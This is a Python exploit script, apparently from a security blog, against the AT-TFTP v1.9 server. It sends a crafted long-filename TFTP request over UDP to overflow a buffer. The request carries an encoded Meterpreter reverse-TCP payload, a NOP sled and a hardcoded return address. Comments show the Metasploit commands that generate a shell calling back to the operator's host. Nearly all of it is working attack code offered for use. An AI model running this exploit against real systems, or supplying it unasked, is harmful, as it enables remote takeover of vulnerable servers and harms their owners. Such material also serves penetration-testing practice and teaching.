# AT-TFTP v1.9 Exploit
# Written for NetSec.ws http://netsec.ws/?p=262
import sys, socket
# Use in the form "python attftp_long_filename.py <Target IP Address> <Port> <Your IP Address>"
host = sys.argv[1] # Recieve IP from user
lhost = sys.argv[3]
port = int(sys.argv[2]) # Recieve Port from user
ret = "\x53\x93\x42\x7e" # Return address - Source Metasploit (Little Endian)
nop = "\x90" * (25-len(lhost)) # Create a NOP string as to bring NOPs + LHOST up to 25 bytes
#msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=192.168.1.2 LPORT=443 EXITFUNC=process R > payload
#cat shellcode | msfencode -b '\x00' -e x86/shaikata_ga_nai -t python
#[*] x86/shikata_ga_nai succeeded with size 210 (iteration=1)
buf = ""
buf += "\xbb\xd2\x8c\x3a\x78\xdb\xd2\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x2e\x31\x58\x15\x03\x58\x15\x83\xc0\x04\xe2"
buf += "\x27\x0d\xd6\xd4\xca\x0e\x27\xd9\xbe\xe5\x60\xc9\xc7"
buf += "\x05\x91\xf6\x57\xcb\xb5\x82\xea\x17\xc1\xe9\x29\x10"
buf += "\xd4\xfe\xda\xb7\xf6\x01\x36\xbc\xc3\x9b\xc7\x2d\x1a"
buf += "\x5c\x5e\x1d\x9c\x96\x6d\x5f\xdd\xa3\xad\x2a\x17\xe8"
buf += "\x4b\xec\x1d\x9a\x70\x45\x29\x2a\x52\x5b\xc4\xd3\x11"
buf += "\x47\x4f\x97\x6a\x64\x6e\x4e\x77\xb8\xe9\x19\x1b\xe4"
buf += "\x15\x7b\x1c\x04\x14\xa0\x86\x4e\x14\x66\xcd\x11\x97"
buf += "\x0d\xa1\x8d\x0a\x9a\x29\xa6\x0a\xfb\xfa\xd0\xda\x30"
buf += "\xce\x74\x6c\x44\x1c\xda\xc6\xcc\xd9\x96\x86\xef\xcf"
buf += "\xc2\x14\x43\xbc\xbf\xd9\x30\x01\x13\x57\x51\xe3\x12"
buf += "\x88\x96\xe9\x43\x04\xc1\x54\x8c\x75\xf2\x70\x35\x33"
buf += "\xa5\x13\x45\x95\x21\x83\x79\xb2\x4f\x51\x1c\xab\x4e"
buf += "\xee\x86\x78\xd8\xf3\x2d\x6f\x89\xa4\xd7\x36\x7a\x4f"
buf += "\xe7\x9f\xd5\xfb\x1b\x70\x85\x54\x77\x16\x90\x9a\x4f"
buf += "\x29\x04"
exploit = "\x00\x02" + nop + buf + ret + "\x83\xc4\x28\xc3\x00netascii\x00" # Our exploit
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Declare a UDP socket
client.sendto(exploit, (host, port)) # Send the exploit over UDP to the nominated addressess